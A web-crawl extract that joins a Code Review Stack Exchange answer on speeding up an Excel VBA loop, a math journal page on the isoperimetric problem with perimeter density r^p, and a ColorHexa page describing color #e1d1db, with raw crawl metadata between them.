force calculation like this:\n\nwsInput.Range(\"$U$12\").Calculate\nwsInput.Range(\"$V$12\").Calculate\nwsInput.Range(\"$W$12\").Calculate\n\n\nBut that might not speed up anything. You're pretty much stuck, since you need to recalculate these three cells before you can do anything, and you need to do that 2,000 times.\n\nI think you're somewhat misusing VBA here, it looks like you could use 3 hidden columns (say, $AA$4:$AC$2004) and use Excel formulas to automatically calculate the would-be \"U\", \"V\" and \"W\" values for each row; the VBA macro could then just copy values from Input!$AA$4:$AC$2004 to Repository!$C$4:$E$2004.. if a macro is even needed for that.\n\nI would suggest naming the ranges/cells in row 12 - anytime you have a specific cell with a specific meaning, it's always better for the VBA code to refer to the meaning rather than the cells' addresses.\n\nI have no clue what these cells mean, but picture this:\n\nDim interestRate As Double\ninterestRate = wsInput.Range(\"InterestRate\").Value\n\n\nThis extra abstraction level somewhat decouples the VBA code from the worksheet structure, which allows you to modify [at least parts of] the worksheet without having to modify the VBA code - for example you could insert another row and now InterestRate is read in row 13 instead of 12, and the VBA code couldn't care less.\n\nYou can define names in the [Formulas] Ribbon tab, under the [Defined Names] section. Or you can just select the cell and type its name in the address/names dropdown, just left of the formula bar.\n\nThis also has the advantage of making your Excel formulas more readable: instead of =$X$12*$N42 a formula can now look like =InterestRate*$N42\n\nOne last thing, I know it's common to call a worksheet variable like wsInput, but I find it sounds backwards and looks Hungarian. I'd call it inputSheet instead; wsRepository would be repositorySheet. Also it wouldn't hurt to rename i for row.\n\nTwo short things that even may be unneeded if yo u excluded them.\n\n## Use Option Explicit\n\nFor one it helps immensely when searching for errors with spelling. Been there done that. It's gruesome.\nSecondly it helps you with writing code that's more similar to \"real\" programming languages. Nothing against vba, but I much prefer languages where you need to declare your variables.\n\n## Use an error handler.\n\nEverytime you turn off screen updating you get into the dangerous zone of \"breaking\" the application in case somethin goes wrong.\n\nInstead do something along the lines of:\n\nOption Explicit\nOn Error Goto ErrorHandler\n\n' a whole lot of code\n\n:ErrorHandler\nApplication.ScreenUpdating = true\nMsgBox \"An error has occurred\"\n'Whatever else you need to do and probably something like\nExit Sub\n\n\nI'm not sure this will work for you, but consider replacing or duplicating the formulas in your \"12\" cells with an Evaluate call. It's a little tricky to avoid runtime errors, so I suggest reading this. It might look something like this.\n\n'wsRepository.Range(\"E\" & i).Value = wsInput.Range(\"U12\").Value\nwsRepository.Range(\"E\" & i).Value = Evaluate(\"SUM(A1:A10)\")\n\n\nOf course, using the formula in U12. Your mileage may vary, but this should let you set calculation to manual (I think). I would prefer the method Mat's Mug described though. This is just another option to try.\n\n## Some other notes\n\n• i is typically used as a loop counter, but row would be more meaningful.\n• 4 and 2004 are mysterious hardcoded numbers. What a lot of programmers refer to as magic numbers. It would good for readability/maintainability to replace them with startRow and lastRow constants.\n• Great comments in my opinion. They're short and clear. Not too much, not too little.\n• I'm not sure why you activate wsInput at the end, but you do a great job of avoiding it elsewhere, make sure you're not needlessly activating the sheet there.\n• I wouldn't expect Evaluate to speed things up though. Aug 18, 2014 at 1:09\n• No. It wouldn't, but it may allow OP to use manual calculation @Mat'sMug and that would speed it up. (Assuming there are many other cells that wouldn't need to be recalculated). It's a stretch, but may be worth a shot. Aug 18, 2014 at 1:13" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8616817,"math_prob":0.68679774,"size":3337,"snap":"2023-40-2023-50","text_gpt3_token_len":817,"char_repetition_ratio":0.10021002,"word_repetition_ratio":0.0,"special_character_ratio":0.23104584,"punctuation_ratio":0.12948518,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.966219,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-03T11:05:00Z\",\"WARC-Record-ID\":\"<urn:uuid:7c369567-40ee-469a-8035-d6a4dcb763d1>\",\"Content-Length\":\"189133\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5eca7462-6e8d-402d-a712-985c93f5c34a>\",\"WARC-Concurrent-To\":\"<urn:uuid:9d7515db-760c-4ee2-85a4-b32b6cc64707>\",\"WARC-IP-Address\":\"104.18.11.86\",\"WARC-Target-URI\":\"https://codereview.stackexchange.com/questions/60323/inefficient-slow-loop-with-calculations-in-worksheet/60331\",\"WARC-Payload-Digest\":\"sha1:55AIVYFT4FDSTGYV7FG7UNB4W77UAZDL\",\"WARC-Block-Digest\":\"sha1:YFAVLAONBQRR4LGGC47R4DOZKPWTH2P7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511075.63_warc_CC-MAIN-20231003092549-20231003122549-00861.warc.gz\"}"}
https://www.aimsciences.org/article/doi/10.3934/cpaa.2018129
[ "", null, "", null, "", null, "", null, "November  2018, 17(6): 2729-2749. doi: 10.3934/cpaa.2018129\n\n## On the isoperimetric problem with perimeter density $r^p$\n\n Universitat Politècnica de Catalunya, member of BGSMath, Barcelona, Spain\n\n* Corresponding author\n\nReceived  December 2016 Revised  July 2017 Published  June 2018\n\nFund Project: The author is supported by FONDECYT grant 11150017.\n\nIn this paper the author studies the isoperimetric problem in ${\\mathbb{R}}^n$ with perimeter density $|x|^p$ and volume density 1. We settle completely the case $n = 2$, completing a previous work by the author: we characterize the case of equality if $0≤p≤1$ and deal with the case $-∞<p<-1$ (with the additional assumption $0∈Ω$). In the case $n≥3$ we deal mainly with the case $-∞<p<0$, showing among others that the results in 2 dimensions do not generalize for the range $-n+1<p<0.$\n\nCitation: Gyula Csató. On the isoperimetric problem with perimeter density $r^p$. Communications on Pure & Applied Analysis, 2018, 17 (6) : 2729-2749. doi: 10.3934/cpaa.2018129\n##### References:\n A. Alvino, F. Brock, F. Chiacchio, A. Mercaldo and M. R. Posteraro, Some isoperimetric inequalities on ${\\mathbb{R}}^n$ with respect to weights $|x|^{α}$, J. Math. Anal. Appl., 1 (2017), 280-318.  doi: 10.1016/j.jmaa.2017.01.085.", null, "", null, "Google Scholar A. Adimurthi and K. Sandeep, A singular Moser-Trudinger embedding and its applications, NoDEA Nonlinear Differential Equations Appl., 13 (2007), 585-603.  doi: 10.1007/s00030-006-4025-9.", null, "", null, "Google Scholar M. F. Betta, F. Brock, A. Mercaldo and M. R. Posteraro, A weighted isoperimetric inequality and applications to symmetrization, J. of Inequal. and Appl., 4 (1999), 215-240.  doi: 10.1155/S1025583499000375.", null, "", null, "Google Scholar W. Boyer, B. Brown, G. R. Chambers, A. Loving and S. Tammen, Isoperimetric Regions in $\\mathbb{R}^n$ with density $r^p$, Anal. Geom. Metr. Spaces, 4 (2016), 236-265.  doi: 10.1515/agms-2016-0009.", null, "", null, "Google Scholar V. Bayle, A. Cañete, F. Morgan and C. Rosales, On the isoperimetric problem in Euclidean space with density, Calc. Var. Partial Differential Equations, 31 (2008), 27-46.  doi: 10.1007/s00526-007-0104-y.", null, "", null, "Google Scholar X. Cabré and X. Ros-Oton, Sobolev and isoperimetric inequalities with monomial weights, J. Differential Equations, 255 (2013), 4312-4336.  doi: 10.1016/j.jde.2013.08.010.", null, "", null, "Google Scholar X. Cabré, X. Ros-Oton and J. Serra, Euclidean balls solve some isoperimetric problems with nonradial weights, C. R. Math. Acad. Sci. Paris, 350 (2012), 945-947.  doi: 10.1016/j.crma.2012.10.031.", null, "", null, "Google Scholar A. Cañete, M. Miranda and D. Vittone, Some isoperimetric problems in planes with density, J. Geom. Anal., 20 (2010), 243-290.  doi: 10.1007/s12220-009-9109-4.", null, "", null, "Google Scholar C. Carroll, A. Jacob, C. Quinn and R. Walters, The isoperimetric problem on planes with density, Bull. Aust. Math. Soc., 78 (2008), 177-197.  doi: 10.1017/S000497270800052X.", null, "", null, "Google Scholar G. R. Chambers, Proof of the log-convex density conjecture, J. Eur. Math. Soc., to appear. Google Scholar G. Csató, An isoperimetric problem with density and the Hardy-Sobolev inequality in ${\\mathbb{R}}^2$, Differential Integral Equations, 28 (2015), 971-988.", null, "Google Scholar G. Csató and P. Roy, Extremal functions for the singular Moser-Trudinger inequality in 2 dimensions, Calc. Var. Partial Differential Equations, 54 (2015), 2341-2366.  doi: 10.1007/s00526-015-0867-5.", null, "", null, "Google Scholar G. Csató and P. Roy, The singular Moser-Trudinger inequality on simply connected domains, Communications in Partial Differential Equations, 41 (2016), 838-847.  doi: 10.1080/03605302.2015.1123276.", null, "", null, "Google Scholar J. Dahlberg, A. Dubbs, E. Newkirk and H. Tran, Isoperimetric regions in the plane with density $r^p$, New York J. Math., 16 (2010), 31-51.", null, "Google Scholar A. Díaz, N. Harman, S. Howe and D. Thompson, Isoperimetric problems in sectors with density, Adv. Geom., 12 (2012), 589-619.", null, "Google Scholar J. L. Barbosa and M. do Carmo, Stability of hypersurfaces with constant mean curvature, Math. Z., 185 (1984), 339-353.  doi: 10.1007/BF01215045.", null, "", null, "Google Scholar A. Figalli and F. Maggi, On the isoperimetric problem for radial log-convex densities, Calc. Var. Partial Differential Equations, 48 (2013), 447-489.  doi: 10.1007/s00526-012-0557-5.", null, "", null, "Google Scholar M. Flucher, Extremal functions for the Trudinger-Moser inequality in 2 dimensions, Comment. Math. Helvetici, 67 (1992), 471-497.  doi: 10.1007/BF02566514.", null, "", null, "Google Scholar N. Fusco, F. Maggi and A. Pratelli, On the isoperimetric problem with respect to a mixed Euclidean-Gaussian density, J. Funct. Anal., 260 (2011), 3678-3717.  doi: 10.1016/j.jfa.2011.01.007.", null, "", null, "Google Scholar L. Di Giosia, J. Habib, L. Kenigsberg, D. Pittman and W. Zhu, Balls Isoperimetric in ${\\mathbb{R}}^n$ with Volume and Perimeter Densities $r^m$ and $r^k$, preprint, arXiv: 1610.05830v1. Google Scholar F. Morgan, Regularity of isoperimetric hypersurfaces in Riemannian manifolds, Trans. Amer. Math. Soc., 355 (2003), 5041-5052.  doi: 10.1090/S0002-9947-03-03061-7.", null, "", null, "Google Scholar F. Morgan and A. Pratelli, Existence of isoperimetric regions in $\\mathbb{R}^n$ with density, Ann. Global Anal. Geom., 43 (2013), 331-365.  doi: 10.1007/s10455-012-9348-7.", null, "", null, "Google Scholar W. Walter, Ordinary Differential Equations, English translation, Springer, 1998. doi: 10.1007/978-1-4612-0601-9.", null, "", null, "Google Scholar\n\nshow all references\n\n##### References:\n A. Alvino, F. Brock, F. Chiacchio, A. Mercaldo and M. R. Posteraro, Some isoperimetric inequalities on ${\\mathbb{R}}^n$ with respect to weights $|x|^{α}$, J. Math. Anal. Appl., 1 (2017), 280-318.  doi: 10.1016/j.jmaa.2017.01.085.", null, "", null, "Google Scholar A. Adimurthi and K. Sandeep, A singular Moser-Trudinger embedding and its applications, NoDEA Nonlinear Differential Equations Appl., 13 (2007), 585-603.  doi: 10.1007/s00030-006-4025-9.", null, "", null, "Google Scholar M. F. Betta, F. Brock, A. Mercaldo and M. R. Posteraro, A weighted isoperimetric inequality and applications to symmetrization, J. of Inequal. and Appl., 4 (1999), 215-240.  doi: 10.1155/S1025583499000375.", null, "", null, "Google Scholar W. Boyer, B. Brown, G. R. Chambers, A. Loving and S. Tammen, Isoperimetric Regions in $\\mathbb{R}^n$ with density $r^p$, Anal. Geom. Metr. Spaces, 4 (2016), 236-265.  doi: 10.1515/agms-2016-0009.", null, "", null, "Google Scholar V. Bayle, A. Cañete, F. Morgan and C. Rosales, On the isoperimetric problem in Euclidean space with density, Calc. Var. Partial Differential Equations, 31 (2008), 27-46.  doi: 10.1007/s00526-007-0104-y.", null, "", null, "Google Scholar X. Cabré and X. Ros-Oton, Sobolev and isoperimetric inequalities with monomial weights, J. Differential Equations, 255 (2013), 4312-4336.  doi: 10.1016/j.jde.2013.08.010.", null, "", null, "Google Scholar X. Cabré, X. Ros-Oton and J. Serra, Euclidean balls solve some isoperimetric problems with nonradial weights, C. R. Math. Acad. Sci. Paris, 350 (2012), 945-947.  doi: 10.1016/j.crma.2012.10.031.", null, "", null, "Google Scholar A. Cañete, M. Miranda and D. Vittone, Some isoperimetric problems in planes with density, J. Geom. Anal., 20 (2010), 243-290.  doi: 10.1007/s12220-009-9109-4.", null, "", null, "Google Scholar C. Carroll, A. Jacob, C. Quinn and R. Walters, The isoperimetric problem on planes with density, Bull. Aust. Math. Soc., 78 (2008), 177-197.  doi: 10.1017/S000497270800052X.", null, "", null, "Google Scholar G. R. Chambers, Proof of the log-convex density conjecture, J. Eur. Math. Soc., to appear. Google Scholar G. Csató, An isoperimetric problem with density and the Hardy-Sobolev inequality in ${\\mathbb{R}}^2$, Differential Integral Equations, 28 (2015), 971-988.", null, "Google Scholar G. Csató and P. Roy, Extremal functions for the singular Moser-Trudinger inequality in 2 dimensions, Calc. Var. Partial Differential Equations, 54 (2015), 2341-2366.  doi: 10.1007/s00526-015-0867-5.", null, "", null, "Google Scholar G. Csató and P. Roy, The singular Moser-Trudinger inequality on simply connected domains, Communications in Partial Differential Equations, 41 (2016), 838-847.  doi: 10.1080/03605302.2015.1123276.", null, "", null, "Google Scholar J. Dahlberg, A. Dubbs, E. Newkirk and H. Tran, Isoperimetric regions in the plane with density $r^p$, New York J. Math., 16 (2010), 31-51.", null, "Google Scholar A. Díaz, N. Harman, S. Howe and D. Thompson, Isoperimetric problems in sectors with density, Adv. Geom., 12 (2012), 589-619.", null, "Google Scholar J. L. Barbosa and M. do Carmo, Stability of hypersurfaces with constant mean curvature, Math. Z., 185 (1984), 339-353.  doi: 10.1007/BF01215045.", null, "", null, "Google Scholar A. Figalli and F. Maggi, On the isoperimetric problem for radial log-convex densities, Calc. Var. Partial Differential Equations, 48 (2013), 447-489.  doi: 10.1007/s00526-012-0557-5.", null, "", null, "Google Scholar M. Flucher, Extremal functions for the Trudinger-Moser inequality in 2 dimensions, Comment. Math. Helvetici, 67 (1992), 471-497.  doi: 10.1007/BF02566514.", null, "", null, "Google Scholar N. Fusco, F. Maggi and A. Pratelli, On the isoperimetric problem with respect to a mixed Euclidean-Gaussian density, J. Funct. Anal., 260 (2011), 3678-3717.  doi: 10.1016/j.jfa.2011.01.007.", null, "", null, "Google Scholar L. Di Giosia, J. Habib, L. Kenigsberg, D. Pittman and W. Zhu, Balls Isoperimetric in ${\\mathbb{R}}^n$ with Volume and Perimeter Densities $r^m$ and $r^k$, preprint, arXiv: 1610.05830v1. Google Scholar F. Morgan, Regularity of isoperimetric hypersurfaces in Riemannian manifolds, Trans. Amer. Math. Soc., 355 (2003), 5041-5052.  doi: 10.1090/S0002-9947-03-03061-7.", null, "", null, "Google Scholar F. Morgan and A. Pratelli, Existence of isoperimetric regions in $\\mathbb{R}^n$ with density, Ann. Global Anal. Geom., 43 (2013), 331-365.  doi: 10.1007/s10455-012-9348-7.", null, "", null, "Google Scholar W. Walter, Ordinary Differential Equations, English translation, Springer, 1998. doi: 10.1007/978-1-4612-0601-9.", null, "", null, "Google Scholar\n Kai Yang. Scattering of the focusing energy-critical NLS with inverse square potential in the radial case. Communications on Pure & Applied Analysis, 2021, 20 (1) : 77-99. doi: 10.3934/cpaa.2020258 Manil T. Mohan. First order necessary conditions of optimality for the two dimensional tidal dynamics system. Mathematical Control & Related Fields, 2020  doi: 10.3934/mcrf.2020045 Parikshit Upadhyaya, Elias Jarlebring, Emanuel H. Rubensson. A density matrix approach to the convergence of the self-consistent field iteration. Numerical Algebra, Control & Optimization, 2021, 11 (1) : 99-115. doi: 10.3934/naco.2020018 Teresa D'Aprile. Bubbling solutions for the Liouville equation around a quantized singularity in symmetric domains. Communications on Pure & Applied Analysis, 2021, 20 (1) : 159-191. doi: 10.3934/cpaa.2020262 Lin Shi, Xuemin Wang, Dingshi Li. Limiting behavior of non-autonomous stochastic reaction-diffusion equations with colored noise on unbounded thin domains. Communications on Pure & Applied Analysis, 2020, 19 (12) : 5367-5386. doi: 10.3934/cpaa.2020242 Wenbin Li, Jianliang Qian. Simultaneously recovering both domain and varying density in inverse gravimetry by efficient level-set methods. Inverse Problems & Imaging, , () : -. doi: 10.3934/ipi.2020073 Zedong Yang, Guotao Wang, Ravi P. Agarwal, Haiyong Xu. Existence and nonexistence of entire positive radial solutions for a class of Schrödinger elliptic systems involving a nonlinear operator. Discrete & Continuous Dynamical Systems - S, 2020  doi: 10.3934/dcdss.2020436 Lihong Zhang, Wenwen Hou, Bashir Ahmad, Guotao Wang. Radial symmetry for logarithmic Choquard equation involving a generalized tempered fractional $p$-Laplacian. Discrete & Continuous Dynamical Systems - S, 2020  doi: 10.3934/dcdss.2020445 Min Chen, Olivier Goubet, Shenghao Li. Mathematical analysis of bump to bucket problem. Communications on Pure & Applied Analysis, 2020, 19 (12) : 5567-5580. doi: 10.3934/cpaa.2020251 Qingfang Wang, Hua Yang. Solutions of nonlocal problem with critical exponent. Communications on Pure & Applied Analysis, 2020, 19 (12) : 5591-5608. doi: 10.3934/cpaa.2020253 Maoding Zhen, Binlin Zhang, Vicenţiu D. Rădulescu. Normalized solutions for nonlinear coupled fractional systems: Low and high perturbations in the attractive case. Discrete & Continuous Dynamical Systems - A, 2020  doi: 10.3934/dcds.2020379 Yongxiu Shi, Haitao Wan. Refined asymptotic behavior and uniqueness of large solutions to a quasilinear elliptic equation in a borderline case. Electronic Research Archive, , () : -. doi: 10.3934/era.2020119 Stefano Bianchini, Paolo Bonicatto. Forward untangling and applications to the uniqueness problem for the continuity equation. Discrete & Continuous Dynamical Systems - A, 2020  doi: 10.3934/dcds.2020384 Reza Lotfi, Zahra Yadegari, Seyed Hossein Hosseini, Amir Hossein Khameneh, Erfan Babaee Tirkolaee, Gerhard-Wilhelm Weber. A robust time-cost-quality-energy-environment trade-off with resource-constrained in project management: A case study for a bridge construction project. Journal of Industrial & Management Optimization, 2020  doi: 10.3934/jimo.2020158 Marco Ghimenti, Anna Maria Micheletti. Compactness results for linearly perturbed Yamabe problem on manifolds with boundary. Discrete & Continuous Dynamical Systems - S, 2020  doi: 10.3934/dcdss.2020453 Alberto Bressan, Sondre Tesdal Galtung. A 2-dimensional shape optimization problem for tree branches. Networks & Heterogeneous Media, 2020  doi: 10.3934/nhm.2020031 Fioralba Cakoni, Pu-Zhao Kow, Jenn-Nan Wang. The interior transmission eigenvalue problem for elastic waves in media with obstacles. Inverse Problems & Imaging, , () : -. doi: 10.3934/ipi.2020075 Shun Zhang, Jianlin Jiang, Su Zhang, Yibing Lv, Yuzhen Guo. ADMM-type methods for generalized multi-facility Weber problem. Journal of Industrial & Management Optimization, 2020  doi: 10.3934/jimo.2020171 Gloria Paoli, Gianpaolo Piscitelli, Rossanno Sannipoli. A stability result for the Steklov Laplacian Eigenvalue Problem with a spherical obstacle. Communications on Pure & Applied Analysis, 2021, 20 (1) : 145-158. doi: 10.3934/cpaa.2020261 Marion Darbas, Jérémy Heleine, Stephanie Lohrengel. Numerical resolution by the quasi-reversibility method of a data completion problem for Maxwell's equations. Inverse Problems & Imaging, 2020, 14 (6) : 1107-1133. doi: 10.3934/ipi.2020056\n\n2019 Impact Factor: 1.105" ]
[ null, "https://www.aimsciences.org:443/style/web/images/white_google.png", null, "https://www.aimsciences.org:443/style/web/images/white_facebook.png", null, "https://www.aimsciences.org:443/style/web/images/white_twitter.png", null, "https://www.aimsciences.org:443/style/web/images/white_linkedin.png", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null, "https://www.aimsciences.org:443/style/web/images/crossref.jpeg", null, "https://www.aimsciences.org:443/style/web/images/math-review.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5817505,"math_prob":0.81506366,"size":14707,"snap":"2020-45-2020-50","text_gpt3_token_len":4983,"char_repetition_ratio":0.17676665,"word_repetition_ratio":0.6569451,"special_character_ratio":0.3698239,"punctuation_ratio":0.27770782,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9611399,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-01T21:48:29Z\",\"WARC-Record-ID\":\"<urn:uuid:acf0a962-2cb2-4970-a83c-11cfafb69c9e>\",\"Content-Length\":\"120670\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fac92975-4522-4adc-9269-78740896e9a1>\",\"WARC-Concurrent-To\":\"<urn:uuid:6f8aca17-cd2b-41f7-8fca-1a4c829f8524>\",\"WARC-IP-Address\":\"107.161.80.18\",\"WARC-Target-URI\":\"https://www.aimsciences.org/article/doi/10.3934/cpaa.2018129\",\"WARC-Payload-Digest\":\"sha1:RWAFP6OC4B34EUFX3KK5GVE5MGZWRE67\",\"WARC-Block-Digest\":\"sha1:K5WFRN6AGEEORELF24MFBSCXIHIIQK2A\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141681524.75_warc_CC-MAIN-20201201200611-20201201230611-00641.warc.gz\"}"}
https://www.colorhexa.com/e1d1db
[ "# #e1d1db Color Information\n\nIn a RGB color space, hex #e1d1db is composed of 88.2% red, 82% green and 85.9% blue. Whereas in a CMYK color space, it is composed of 0% cyan, 7.1% magenta, 2.7% yellow and 11.8% black. It has a hue angle of 322.5 degrees, a saturation of 21.1% and a lightness of 85.1%. #e1d1db color hex could be obtained by blending #ffffff with #c3a3b7. Closest websafe color is: #cccccc.\n\n• R 88\n• G 82\n• B 86\nRGB color chart\n• C 0\n• M 7\n• Y 3\n• K 12\nCMYK color chart\n\n#e1d1db color description : Light grayish pink.\n\n# #e1d1db Color Conversion\n\nThe hexadecimal color #e1d1db has RGB values of R:225, G:209, B:219 and CMYK values of C:0, M:0.07, Y:0.03, K:0.12. Its decimal value is 14799323.\n\nHex triplet RGB Decimal e1d1db `#e1d1db` 225, 209, 219 `rgb(225,209,219)` 88.2, 82, 85.9 `rgb(88.2%,82%,85.9%)` 0, 7, 3, 12 322.5°, 21.1, 85.1 `hsl(322.5,21.1%,85.1%)` 322.5°, 7.1, 88.2 cccccc `#cccccc`\nCIE-LAB 85.364, 7.267, -2.943 66.636, 66.723, 76.382 0.318, 0.318, 66.723 85.364, 7.84, 337.954 85.364, 8.574, -5.777 81.684, 2.668, 1.737 11100001, 11010001, 11011011\n\n# Color Schemes with #e1d1db\n\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #d1e1d7\n``#d1e1d7` `rgb(209,225,215)``\nComplementary Color\n• #dfd1e1\n``#dfd1e1` `rgb(223,209,225)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #e1d1d3\n``#e1d1d3` `rgb(225,209,211)``\nAnalogous Color\n• #d1e1df\n``#d1e1df` `rgb(209,225,223)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #d3e1d1\n``#d3e1d1` `rgb(211,225,209)``\nSplit Complementary Color\n• #d1dbe1\n``#d1dbe1` `rgb(209,219,225)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #dbe1d1\n``#dbe1d1` `rgb(219,225,209)``\n• #d7d1e1\n``#d7d1e1` `rgb(215,209,225)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #dbe1d1\n``#dbe1d1` `rgb(219,225,209)``\n• #d1e1d7\n``#d1e1d7` `rgb(209,225,215)``\n• #c3a3b7\n``#c3a3b7` `rgb(195,163,183)``\n• #cdb2c3\n``#cdb2c3` `rgb(205,178,195)``\n• #d7c2cf\n``#d7c2cf` `rgb(215,194,207)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #ebe0e7\n``#ebe0e7` `rgb(235,224,231)``\n• #f5f0f3\n``#f5f0f3` `rgb(245,240,243)``\n• #ffffff\n``#ffffff` `rgb(255,255,255)``\nMonochromatic Color\n\n# Alternatives to #e1d1db\n\nBelow, you can see some colors close to #e1d1db. Having a set of related colors can be useful if you need an inspirational 